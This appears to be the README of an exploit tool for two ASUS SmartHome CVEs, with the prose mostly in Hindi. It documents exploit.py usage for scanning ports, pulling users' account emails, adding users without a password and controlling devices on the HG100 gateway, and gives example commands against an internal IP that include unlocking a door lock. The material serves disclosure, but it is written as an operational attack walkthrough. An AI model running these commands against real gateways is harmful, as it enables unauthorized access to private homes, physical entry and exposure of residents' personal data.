
ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063
CVE-2019-11061 : HG100 में टूटा हुआ एक्सेस कंट्रोल
प्रभावित उत्पाद : ASUS SmartHome Gateway HG100 फर्मवेयर संस्करण < 4.00.09
CVE-2019-11063 : SmartHome ऐप में टूटा हुआ एक्सेस कंट्रोल
प्रभावित उत्पाद : ASUS SmartHome Android ऐप संस्करण < 3.0.45_190701
यदि हमलावर HG100 या साथी ऐप (android या iPhone) वाले मोबाइल डिवाइस के समान आंतरिक नेटवर्क पर है, तो हमलावर उन्हें नियंत्रण अनुरोध भेज सकता है।
usage: exploit.py scan [-h] [-v] target_ip
scan exploitable port
positional arguments:
target_ip scan ip
optional arguments:
-h, --help show this help message and exit
-v show account email list
usage: exploit.py cmd [-h]
(-u | -l | -s device_id | -c device_id status | -a username)
[--user username] [--new-user username] [-v]
target
send command to target
positional arguments:
target <target-ip>:<port>
optional arguments:
-h, --help show this help message and exit
-u, --list-user list all user in device
-l, --list-device list all device status
-s device_id, --device-status device_id
list device status
-c device_id status, --device-control device_id status
control device status
-a username, --add-user username
add a user to device
--user username assign user for cmd
--new-user username create a new user for cmd
-v show account email list
$ ./exploit.py cmd https://10.42.50.166:8083 -l
मोबाइल डिवाइस (एंड्रॉइड या iPhone के लिए साथी ऐप स्थापित) का शोषण योग्य पोर्ट स्कैन करें:
नोट: -v विकल्प HG100 में जोड़े गए उपयोगकर्ताओं को सूचीबद्ध करेगा।
या
HG100 का शोषण योग्य पोर्ट स्कैन करें:
एचजी100 में जोड़े गए सभी उपयोगकर्ताओं को प्राप्त करें:

या एक नया जोड़ें:
नोट: "cmd" तर्क के लिए https://10.42.50.166:8083 का उपयोग करें।
उदाहरण के लिए:
$ ./exploit.py cmd https://10.42.50.166:8083 -u
SmartHome Gateway के अंतर्गत सभी उपकरणों की जानकारी प्राप्त करें:
नोट: यदि --user विकल्प सेट नहीं है, तो HG100 में पहला उपयोगकर्ता स्वचालित रूप से चुना जाएगा। (क्योंकि पासवर्ड की आवश्यकता नहीं है)
ऐप से तुलना करें:
DoorLock को नियंत्रित (अनलॉक) करें।
नोट: मान 1028 -l विकल्प (चरण 3) से प्राप्त हुआ है।
परिणाम:
